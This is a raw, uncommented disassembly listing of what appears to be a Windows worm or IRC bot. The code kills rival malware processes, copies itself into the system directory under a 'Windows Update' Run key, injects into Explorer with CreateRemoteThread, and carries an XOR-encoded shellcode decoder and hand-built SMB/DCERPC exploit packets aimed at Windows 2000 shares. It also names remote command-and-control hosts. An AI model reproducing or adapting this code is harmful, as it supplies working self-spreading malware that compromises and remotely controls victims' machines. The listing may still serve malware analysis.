; sub_31003236+8F�j
movzx edi, ds:word_31006038
call esi ; rand
cdq
idiv edi
add edx, edi
push edx
call ebx ; Sleep
call sub_31002E68
test eax, eax
jz loc_3100325C
pop edi
pop esi
pop ebx
loc_310032EF: ; CODE XREF: sub_31003236+11�j
push 0
call dword_310010BC ; ExitThread
xor eax, eax
leave
retn 4
sub_31003236 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_310032FD proc near ; DATA XREF: sub_31002E7C+101�o
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
xor esi, esi
mov ds:dword_31006030, esi
loc_3100330D: ; CODE XREF: sub_310032FD+24�j
call sub_31002C10
test eax, eax
jnz short loc_31003323
push 1388h
call dword_310010D4 ; Sleep
jmp short loc_3100330D
; ---------------------------------------------------------------------------
loc_31003323: ; CODE XREF: sub_310032FD+17�j
lea eax, [ebp+var_4]
push esi
push eax
call dword_31001148 ; InternetGetConnectedState
test [ebp+var_4], 2
push 50h
mov ds:dword_31006034, esi
pop ebx
mov ds:word_31006038, 96h
jz short loc_3100335E
mov ds:dword_31006034, 1
mov ebx, 12Ch
mov ds:word_31006038, 14h
loc_3100335E: ; CODE XREF: sub_310032FD+47�j
push edi
call sub_31002BD1
mov esi, eax
mov ax, word ptr ds:dword_31006028
push eax
call dword_31001184 ; ntohs
mov [ebp+var_8], eax
lea eax, [ebp+var_8]
push 2
push eax
push offset loc_31005122
call sub_310037F8 ; memcpy
mov eax, esi
push 4
xor eax, 0AAAAAAAAh
pop edi
mov [ebp+var_C], eax
lea eax, [ebp+var_C]
push edi
push eax
push offset loc_31005124
call sub_310037F8 ; memcpy
add esp, 18h
cmp esi, 100007Fh
jz short loc_310033BA
push esi
push offset sub_3100314A
call sub_31002AEF
pop ecx
pop ecx
loc_310033BA: ; CODE XREF: sub_310032FD+AE�j
; sub_310032FD+CB�j
push esi
push offset sub_310031AE
call sub_31002AEF
pop ecx
dec edi
pop ecx
jnz short loc_310033BA
test ebx, ebx
pop edi
jle short loc_310033E2
mov esi, ebx
loc_310033D1: ; CODE XREF: sub_310032FD+E3�j
push 0
push offset sub_31003236
call sub_31002AEF
pop ecx
dec esi
pop ecx
jnz short loc_310033D1
loc_310033E2: ; CODE XREF: sub_310032FD+D0�j
push 0FFFFFFFFh
call dword_310010D4 ; Sleep
pop esi
xor eax, eax
pop ebx
leave
retn
sub_310032FD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_310033F0 proc near ; CODE XREF: sub_31003589+85�p
; sub_310036FC+B5�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
push 0F003Fh
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3100100C ; RegOpenKeyExA
test eax, eax
jnz short loc_31003423
push [ebp+arg_8]
push [ebp+arg_4]
call dword_31001010 ; RegDeleteValueA
push [ebp+arg_4]
call dword_31001014 ; RegCloseKey
loc_31003423: ; CODE XREF: sub_310033F0+1C�j
pop ebp
retn
sub_310033F0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31003425 proc near ; CODE XREF: sub_31002C8E+33�p
; sub_31003589+76�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_10]
push esi
mov [ebp+var_4], eax
lea eax, [ebp+arg_10]
push eax
xor esi, esi
push 0F003Fh
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3100100C ; RegOpenKeyExA
test eax, eax
jz short loc_31003451
push 1
pop eax
jmp short loc_3100347B
; ---------------------------------------------------------------------------
loc_31003451: ; CODE XREF: sub_31003425+25�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+arg_4]
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_8]
push [ebp+arg_10]
call dword_31001008 ; RegQueryValueExA
test eax, eax
jz short loc_31003470
push 2
pop esi
loc_31003470: ; CODE XREF: sub_31003425+46�j
push [ebp+arg_10]
call dword_31001014 ; RegCloseKey
mov eax, esi
loc_3100347B: ; CODE XREF: sub_31003425+2A�j
pop esi
leave
retn
sub_31003425 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3100347E proc near ; CODE XREF: sub_31003630+96�p
; sub_310036FC+60�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push esi
xor esi, esi
lea eax, [ebp+arg_4]
push esi
push eax
push esi
push 0F003Fh
push esi
push esi
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_31001000 ; RegCreateKeyExA
test eax, eax
jz short loc_310034A7
push 1
pop eax
jmp short loc_310034CE
; ---------------------------------------------------------------------------
loc_310034A7: ; CODE XREF: sub_3100347E+22�j
push [ebp+arg_10]
push [ebp+arg_C]
push 1
push esi
push [ebp+arg_8]
push [ebp+arg_4]
call dword_31001004 ; RegSetValueExA
test eax, eax
jz short loc_310034C3
push 2
pop esi
loc_310034C3: ; CODE XREF: sub_3100347E+40�j
push [ebp+arg_4]
call dword_31001014 ; RegCloseKey
mov eax, esi
loc_310034CE: ; CODE XREF: sub_3100347E+27�j
pop esi
pop ebp
retn
sub_3100347E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_310034D1 proc near ; CODE XREF: sub_31003589+91�p
var_128 = dword ptr -128h
var_120 = dword ptr -120h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 128h
push ebx
mov ebx, [ebp+arg_0]
push esi
push ebx
call dword_310010D0 ; lstrlenA
mov esi, eax
dec esi
test esi, esi
jle loc_31003585
loc_310034F1: ; CODE XREF: sub_310034D1+27�j
cmp byte ptr [esi+ebx], 5Ch
jz short loc_310034FA
dec esi
jns short loc_310034F1
loc_310034FA: ; CODE XREF: sub_310034D1+24�j
push 0
push 2
call sub_31003874 ; CreateToolhelp32Snapshot
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_31003585
push 128h
lea eax, [ebp+var_128]
push 0
push eax
call sub_310037FE ; memset
add esp, 0Ch
lea eax, [ebp+var_128]
mov [ebp+var_128], 128h
push eax
push [ebp+arg_0]
call sub_3100386E ; Process32First
test eax, eax
jz short loc_31003585
lea esi, [esi+ebx+1]
loc_31003542: ; CODE XREF: sub_310034D1+B2�j
lea eax, [ebp+var_104]
push eax
push esi
call dword_31001114 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_31003572
push [ebp+var_120]
push 0
push 1F0FFFh
call dword_310010E8 ; OpenProcess
push 0
push eax
call dword_31001060 ; TerminateProcess
loc_31003572: ; CODE XREF: sub_310034D1+83�j
lea eax, [ebp+var_128]
push eax
push [ebp+arg_0]
call sub_31003868 ; Process32Next
test eax, eax
jnz short loc_31003542
loc_31003585: ; CODE XREF: sub_310034D1+1A�j
; sub_310034D1+38�j ...
pop esi
pop ebx
leave
retn
sub_310034D1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31003589 proc near ; CODE XREF: UPX0:31002E45�p
var_134 = byte ptr -134h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 134h
push ebx
push esi
lea eax, [ebp+var_2C]
push edi
mov [ebp+var_2C], offset aWindowsSecurit ; "Windows Security Manager"
mov [ebp+var_28], offset aDiskDefragment ; "Disk Defragmenter"
mov [ebp+var_24], offset aSystemRestoreS ; "System Restore Service"
mov [ebp+var_20], offset aBotLoader ; "Bot Loader"
mov [ebp+var_1C], offset aSystray ; "SysTray"
mov [ebp+var_18], offset aWinupdate ; "WinUpdate"
mov [ebp+var_14], offset aWindowsUpdateS ; "Windows Update Service"
mov [ebp+var_10], offset aAvserve_exe ; "avserve.exe"
mov [ebp+var_C], offset aAvserve2_exeup ; "avserve2.exeUpdate Service"
mov [ebp+var_4], eax
mov [ebp+var_8], 9
mov edi, offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
mov esi, 80000002h
loc_310035EB: ; CODE XREF: sub_31003589+A0�j
mov eax, [ebp+var_4]
push 104h
mov ebx, [eax]
lea eax, [ebp+var_134]
push eax
push ebx
push edi
push esi
call sub_31003425
add esp, 14h
test eax, eax
jnz short loc_31003622
push ebx
push edi
push esi
call sub_310033F0
lea eax, [ebp+var_134]
push eax
call sub_310034D1
add esp, 10h
loc_31003622: ; CODE XREF: sub_31003589+80�j
add [ebp+var_4], 4
dec [ebp+var_8]
jnz short loc_310035EB
pop edi
pop esi
pop ebx
leave
retn
sub_31003589 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31003630 proc near ; CODE XREF: sub_310036FC+6A�p
; sub_310036FC+CA�p
var_78 = byte ptr -78h
var_14 = byte ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 78h
cmp [ebp+arg_0], 0
jz short loc_31003645
push [ebp+arg_0]
call dword_31001068 ; DeleteFileA
loc_31003645: ; CODE XREF: sub_31003630+A�j
lea eax, [ebp+var_78]
push 63h
push eax
call dword_310010B8 ; GetSystemDirectoryA
test eax, eax
jz locret_310036FA
push esi
call dword_31001128 ; rand
and eax, 3
add eax, 5
push eax
lea eax, [ebp+var_14]
push eax
call sub_31002B10
mov esi, dword_31001090
pop ecx
pop ecx
lea eax, [ebp+var_14]
push offset a_exe ; ".exe"
push eax
call esi ; lstrcatA
lea eax, [ebp+var_78]
push offset asc_31005DCC ; "\\"
push eax
call esi ; lstrcatA
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_78]
push eax
call esi ; lstrcatA
lea eax, [ebp+var_78]
push 0
push eax
push [ebp+arg_4]
call dword_31001050 ; CopyFileA
lea eax, [ebp+var_78]
push eax
call dword_310010D0 ; lstrlenA
inc eax
push eax
lea eax, [ebp+var_78]
push eax
push offset aWindowsUpdate ; "Windows Update"
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call sub_3100347E
add esp, 14h
push ds:dword_31006000
call dword_310010A4 ; CloseHandle
lea eax, [ebp+var_78]
push 0
push eax
call dword_31001054 ; WinExec
push 1F4h
call dword_310010D4 ; Sleep
push 0
call dword_3100106C ; ExitProcess
pop esi
locret_310036FA: ; CODE XREF: sub_31003630+23�j
leave
retn
sub_31003630 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_310036FC proc near ; CODE XREF: UPX0:31002E4A�p
var_DC = byte ptr -0DCh
var_78 = byte ptr -78h
var_14 = byte ptr -14h
push ebp
mov ebp, esp
sub esp, 0DCh
push ebx
push esi
push edi
lea eax, [ebp+var_78]
push 63h
xor edi, edi
push eax
push edi
call dword_31001048 ; GetModuleFileNameA
test eax, eax
jz loc_310037CD
lea eax, [ebp+var_DC]
push 63h
push eax
push offset aWindowsUpdate ; "Windows Update"
mov esi, 80000002h
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push esi
mov ds:dword_3100603C, edi
call sub_31003425
add esp, 14h
test eax, eax
jz short loc_31003770
push 2
push offset a1 ; "1"
push offset aClient ; "Client"
push offset aSoftwareMicr_0 ; "Software\\Microsoft\\Wireless"
push esi
call sub_3100347E
lea eax, [ebp+var_78]
push eax
push edi
call sub_31003630
add esp, 1Ch
jmp short loc_310037CD
; ---------------------------------------------------------------------------
loc_31003770: ; CODE XREF: sub_310036FC+4C�j
lea eax, [ebp+var_78]
push eax
lea eax, [ebp+var_DC]
push eax
call dword_3100104C ; lstrcmpiA
test eax, eax
jnz short loc_310037BB
lea eax, [ebp+var_14]
push 14h
mov ebx, offset aClient ; "Client"
push eax
mov edi, offset aSoftwareMicr_0 ; "Software\\Microsoft\\Wireless"
push ebx
push edi
push esi
call sub_31003425
add esp, 14h
test eax, eax
jnz short loc_310037CD
push ebx
push edi
push esi
mov ds:dword_3100603C, 1
call sub_310033F0
add esp, 0Ch
jmp short loc_310037CD
; ---------------------------------------------------------------------------
loc_310037BB: ; CODE XREF: sub_310036FC+87�j
lea eax, [ebp+var_78]
push eax
lea eax, [ebp+var_DC]
push eax
call sub_31003630
pop ecx
pop ecx
loc_310037CD: ; CODE XREF: sub_310036FC+1D�j
; sub_310036FC+72�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_310036FC endp
; =============== S U B R O U T I N E =======================================
sub_310037D2 proc near ; CODE XREF: sub_31001248+2A�p
; sub_310014E6+27�p ...
arg_0 = dword ptr 4
push 4
push 1000h
push [esp+8+arg_0]
push 0
call dword_31001044 ; VirtualAlloc
retn
sub_310037D2 endp
; =============== S U B R O U T I N E =======================================
sub_310037E6 proc near ; CODE XREF: sub_31001248+EB�p
; sub_310014E6+75�p ...
arg_0 = dword ptr 4
push 8000h
push 0
push [esp+8+arg_0]
call dword_31001040 ; VirtualFree
retn
sub_310037E6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_310037F8 proc near ; CODE XREF: sub_31001248+4B�p
; sub_31001651+93�p ...
jmp dword_31001124
sub_310037F8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_310037FE proc near ; CODE XREF: sub_31001582+20�p
; sub_31001651+128�p ...
jmp dword_31001120
sub_310037FE endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31003804 proc near ; CODE XREF: sub_31001651+9C�p
; sub_31001651+C5�p ...
jmp dword_3100111C
sub_31003804 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_31003810 proc near ; CODE XREF: sub_31001651+8�p
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_31003830
loc_3100381C: ; CODE XREF: sub_31003810+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_3100381C
loc_31003830: ; CODE XREF: sub_31003810+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_31003810 endp
; ---------------------------------------------------------------------------
align 10h
loc_31003840: ; CODE XREF: UPX0:31003881�j
; UPX0:31003898�j
jmp dword ptr locret_3100110E+2
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31003850 proc near ; CODE XREF: sub_31002280+5�p
; sub_31002463+5�p
jmp dword ptr loc_3100110C
sub_31003850 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31003856 proc near ; DATA XREF: sub_31002E7C+A�o
jmp dword ptr loc_31001100
sub_31003856 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_3100385C proc near ; CODE XREF: sub_31002FF1+10C�p
; sub_31002FF1+119�p ...
jmp dword_310010FC
sub_3100385C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31003862 proc near ; CODE XREF: sub_31002FF1+35�p
jmp dword_310010F8
sub_31003862 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31003868 proc near ; CODE XREF: sub_310034D1+AB�p
jmp dword_31001064
sub_31003868 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_3100386E proc near ; CODE XREF: sub_310034D1+64�p
jmp dword_3100105C
sub_3100386E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31003874 proc near ; CODE XREF: sub_310034D1+2D�p
jmp dword_31001058
sub_31003874 endp
; ---------------------------------------------------------------------------
align 4
loc_3100387C: ; DATA XREF: sub_31002280�o
mov eax, offset dword_310038A0
jmp loc_31003840
; ---------------------------------------------------------------------------
align 4
lea ecx, [ebp-2F4h]
jmp loc_31001E68
; ---------------------------------------------------------------------------
loc_31003893: ; DATA XREF: sub_31002463�o
mov eax, offset dword_310038F8
jmp loc_31003840
; ---------------------------------------------------------------------------
align 10h
dword_310038A0 dd 19930520h, 2, 310038C0h, 1, 310038D0h, 3 dup(0)
; DATA XREF: UPX0:loc_3100387C�o
dd 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 3 dup(0)
dd 2 dup(1), 310038E8h, 4 dup(0)
dd offset loc_31002374
dword_310038F8 dd 19930520h, 1, 31003918h, 5 dup(0) dd 0FFFFFFFFh, 31003888h, 5B8h dup(0)
dword_31005000 dd 206h, 2400h, 31415352h, 800h, 10001h, 0A495BDEFh, 0DD499F8Eh
; DATA XREF: sub_310011D9+3A�o
dd 64DB1F45h, 0DE5B5C5h, 23CBE2AAh, 63639922h, 7318481Ch
dd 749AC3F2h, 4D855620h, 0AD0FE1CCh, 691506D3h, 0A8FD8D37h
dd 700B1698h, 45504FCEh, 324A3914h, 5C10E3EFh, 0DFBDD847h
dd 371EBA84h, 8B817380h, 7D4A0DF5h, 2DFE92E0h, 0C699C9C5h
dd 9C85E020h, 6A5068BDh, 8250B629h, 7F42C334h, 1C980811h
dd 9CE7B7B2h, 3D77899Dh, 0A4D3971Ah, 0A58D5029h, 8D463A96h
dd 1612E8FCh, 44AF10EBh, 0D0F84570h, 0B178966Ah, 0EB51439Fh
dd 7086A827h, 0DE098A39h, 0C1A1C214h, 0BF167A53h, 611A85C4h
dd 9829E70Fh, 8966209Eh, 0CB1FE53h, 0ECCA9407h, 0A11E75A3h
dd 0B4E8F91Dh, 1A4ECBC5h, 69D7F0DBh, 8C1A8739h, 18C67B94h
dd 3EB38213h, 0E0424BBFh, 8400EB67h, 0AA60B737h, 22D7D8B3h
dd 7A650480h, 86FF4BA6h, 0F6458558h, 56EEF96Eh, 32002FC9h
dd 0B7A63B4Ah, 0EBD3D87Ah
aCont db 'cont',0 ; DATA XREF: sub_310011C0+3�o
align 10h
loc_31005120: ; DATA XREF: sub_31001651+24E�o
; sub_31001651+260�o ...
jmp short loc_31005149
; ---------------------------------------------------------------------------
loc_31005122: ; DATA XREF: sub_310032FD+7F�o
adc dh, [esi]
loc_31005124: ; DATA XREF: sub_310032FD+9B�o
aad 0AAh
stosb
stosd
loc_31005128: ; CODE XREF: UPX0:loc_31005149�p
pop ebp
xor ecx, ecx
mov cx, 226h
lea esi, [ebp+5]
mov edi, esi
loc_31005134: ; CODE XREF: UPX0:31005145�j
mov al, [esi]
cmp al, 99h
jnz short loc_3100513F
inc esi
mov al, [esi]
sub al, 30h
loc_3100513F: ; CODE XREF: UPX0:31005138�j
inc esi
xor al, 99h
mov [edi], al
inc edi
loop loc_31005134
jmp short near ptr loc_31005152+1
; ---------------------------------------------------------------------------
loc_31005149: ; CODE XREF: UPX0:loc_31005120�j
call loc_31005128
bound esp, cs:[ebp+67h]
loc_31005152: ; CODE XREF: UPX0:31005147�j
db 2Eh
jno short near ptr dword_31005000+0E8h
cdq
leave
cdq
leave
cdq
leave
adc bh, ch
mov ebp, 9916FD91h
leave
sal dword ptr [edx+68h], 0AAh
inc edx
std
db 66h
stosb
std
adc [edx-670EE3ECh], bh
cdq
leave
cdq
leave
leave
rep cwde
icebp
cwde
cdq
leave
xchg bl, [ecx-67F78E37h]
cdq
leave
cdq
leave
nop
pop edi
retf
; ---------------------------------------------------------------------------
dw 9237h
dd 0BB1C9659h, 99C99998h, 997518C9h, 0C9999BC9h, 0F1CDC999h
dd 0C9999898h, 0D571C999h, 99C99998h, 47ECE4C9h, 995D1854h
dd 0C9999BC9h, 9FF3C999h, 9BF398F3h, 9998AE71h, 0F3C999C9h
dd 1065E368h, 99981C1Ch, 1AC999C9h, 5EFFD975h, 999BBD9Dh
dd 0DC12FFC9h, 0DD10FF4Dh, 0DC129BBDh, 3333AC4Fh, 0DD103333h
dd 59B29DBDh, 91BDE514h, 45123232h, 66CA89F3h, 99981C2Ch
dd 71C999C9h, 99C9996Eh, 13C999C9h, 1A744167h, 5992D95Dh
dd 99341C96h, 99C999C9h, 0F19DF3C9h, 9989C999h, 0F1C999C9h
dd 0C999C999h, 0F3C99998h, 6471C999h, 0C999C999h, 0F367C999h
dd 1C10F0E3h, 0C99998E4h, 99F3C999h, 0C999F1C9h, 9998C999h
dd 2C66C9C9h, 0C999981Ch, 2171C999h, 0C999C999h, 0E86FC999h
dd 0F3C997C0h, 1C2C669Bh, 99C99998h, 993F71C9h, 99C999C9h
dd 0E5C1D8C9h, 0C959B2D5h, 0C99BF3C9h, 0C999F1C9h, 0C999C999h
dd 0E90414D9h, 99C99998h, 2871CAC9h, 0C999C999h, 688DC999h
dd 1C109161h, 0C99998F5h, 1AC3C999h, 0A7ED6661h, 0F35D12CDh
dd 0CBC9C999h, 98E42C66h, 0C999C999h, 98F52C66h, 0C999C999h
dd 0C9991071h, 0C999C999h, 96A6485Ah, 0F52C66C0h, 99C99998h
dd 99E071C9h, 99C999C9h, 0A7294CC9h, 149CF3EBh, 9998E904h
dd 0CAC999C9h, 0C999FE71h, 0C999C999h, 7126F434h, 71C999F3h
dd 99C999C5h, 0F9C999C9h, 0ECEF133Bh, 0C999ABA8h, 2 dup(0C999C999h)
dd 0EDFFC5B7h, 0FDE9ECE9h, 0FCE1FCB7h, 6 dup(0C999C999h)
dd 0F5CAC999h, 99E9FCFCh, 0EBFCF2C9h, 0AAF5FCF7h, 0C7C999ABh
dd 59AAF934h, 662A2DB4h, 0E6ACC91Eh, 0C9A5B7E7h, 9DB8BD9Ch
dd 71CDC982h, 99C99992h, 0BFC999C9h, 14513519h, 0A95BDFDh
dd 34C79172h, 99C871F9h, 99C999C9h, 0A5D212C9h, 0E180D512h
dd 6FAA529Ah, 9A2A8D14h, 8B12B9C8h, 59AA4A9Ah, 0AB9E5958h
dd 0A319DB9Bh, 6CECC999h, 85BDDDA2h, 0A2DF9EEDh, 44EB81E8h
dd 0BDC81255h, 2E964A9Ah, 0D812EB8Dh, 125A9A85h, 5A9A099Dh
dd 85BDDD10h, 181C10F8h, 99C99998h, 664966C9h, 12FEFD7Fh
dd 0C999A987h, 1295C212h, 821285C2h, 5A91C212h, 0FDF7FCB7h
dd 0B7h
dword_310053FC dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_31001651+186�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_31005488 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31001651+1BA�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 10h
dd 0
dword_31005534 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31001651+1EE�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_31005614 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31001651+8D�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC: ; DATA XREF: sub_31001651+BF�o
unicode 0, <C$>,0
a????? db '?????',0
align 8
dword_31005678 dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31001651+2D4�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dword_310056E4 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31001651+308�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_31005788 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31001651+4EE�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
dword_31005808 dd 401495h, 3, 40707Ch, 1, 0 dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dword_3100589C dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31001651+347�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dword_31005908 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31001651+372�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_3100597C dd 0 dd 40A89Ah, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 4 dup(0)
dd 586E6957h, 72502050h, 6Fh, 0Ah dup(0)
dword_31005A40 dd 1004600h dd 1, 326E6957h, 7250206Bh, 6Fh, 0Ah dup(0)
dword_31005A7C dd 7515123Ch, 2, 326E6957h, 5341206Bh, 0Bh dup(0)
; DATA XREF: sub_31001651+41B�o
; sub_31001651+45D�o
dd 751C123Ch, 0Fh dup(0)
; ---------------------------------------------------------------------------
loc_31005AF8: ; DATA XREF: sub_31001651+44A�o
jmp short loc_31005B00
; ---------------------------------------------------------------------------
jmp short loc_31005B02
; ---------------------------------------------------------------------------
align 10h
loc_31005B00: ; CODE XREF: UPX0:loc_31005AF8�j
; DATA XREF: sub_31001651+5C�o
pop esp
pop esp
loc_31005B02: ; CODE XREF: UPX0:31005AFA�j
and eax, 70695C73h
arpl [eax+eax], sp
; ---------------------------------------------------------------------------
dw 0
dword_31005B0C dd 1CEC8166h dword_31005B10 dd 0E4FF07h aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_31001BB8+62�o
align 4
aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_31001BB8+39�o
align 10h
aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_31001BB8+2A�o
align 4
aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_31001BB8+1B�o
align 4
aAdvapi32 db 'advapi32',0 ; DATA XREF: sub_31001BB8+8�o
; sub_31002E7C+A2�o
align 4
aUterm12 db 'uterm12',0 ; DATA XREF: sub_31001C40:loc_31001D25�o
; UPX0:31002E1B�o ...
aShell_traywnd db 'Shell_TrayWnd',0 ; DATA XREF: sub_31001C40+58�o
align 10h
aCreateremoteth db 'CreateRemoteThread',0 ; DATA XREF: sub_31001C40:loc_31001C87�o
align 4
aVirtualallocex db 'VirtualAllocEx',0 ; DATA XREF: sub_31001C40+34�o
align 4
aKernel32 db 'kernel32',0 ; DATA XREF: sub_31001C40+18�o
align 10h
off_31005BC0 dd offset aMoscowAdvokat_ ; DATA XREF: sub_31002463+C0�r
; sub_31002463+112�r
; "moscow-advokat.ru"
dd offset aGraz_at_eu_und ; "graz.at.eu.undernet.org"
